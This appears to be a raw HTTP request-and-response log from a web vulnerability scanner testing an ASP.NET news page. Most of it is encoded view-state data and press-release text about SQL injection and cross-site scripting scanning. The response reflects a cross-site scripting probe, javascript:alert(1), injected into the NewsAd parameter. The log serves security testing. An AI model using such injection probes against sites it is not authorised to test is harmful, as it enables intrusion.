ICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkfCyPhouoc9T07CkSiDvxgplY0cc%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKx7LcVAv6Q%2FOMBAtCnkuUEArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODAwK%2Fk%2F%2FECQK%2Fk%2F%2FECQK%2Fk5ObAQK%2Fk5ObAQK%2Fk4e%2BCgK%2Fk4e%2BCgK%2Fk7vVAwK%2Fk7vVAwK%2Fk6%2FoDAK%2Fk6%2FoDAK%2Fk8OMBAK%2Fk8OMBAK%2Fk%2FejDQK%2Fk%2FejDQK%2Fk%2BvGBgK%2Fk%2BvGBgK%2Fk9%2BvAwK%2Fk9%2BvAwK%2Fk%2FPCDAK%2Fk%2FPCDAKQut3rDwKQut3rDwKQuvGOBwKQuvGOBwKQuuUlApC65SUCkLqZ%2BAkCkLqZ%2BAkCkLqNnwECkLqNnwECkLqhsgoCkLqhsgoCkLrV1gMCkLrV1gMCkLrJ7QwCkLrJ7QwCkLq91QkCkLq91QkCkLrR6QICkLrR6QIC19mQngcC19mQngcC19mENQLX2YQ1AtfZuMgJAtfZuMgJAtfZrO8CAtfZrO8CAtfZwIMKAtfZwIMKAtfZ9KYDAtfZ9KYDAtfZ6P0MAtfZ6P0MAtfZnJAEAtfZnJAEZPSnvrIdg8X%2FqqjYsEEZ5ETd0S8%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:43:03 GMT Content-Length: 30672
Response Body - size: 30,672 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=javascript%3aalert(1)%3b&id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibG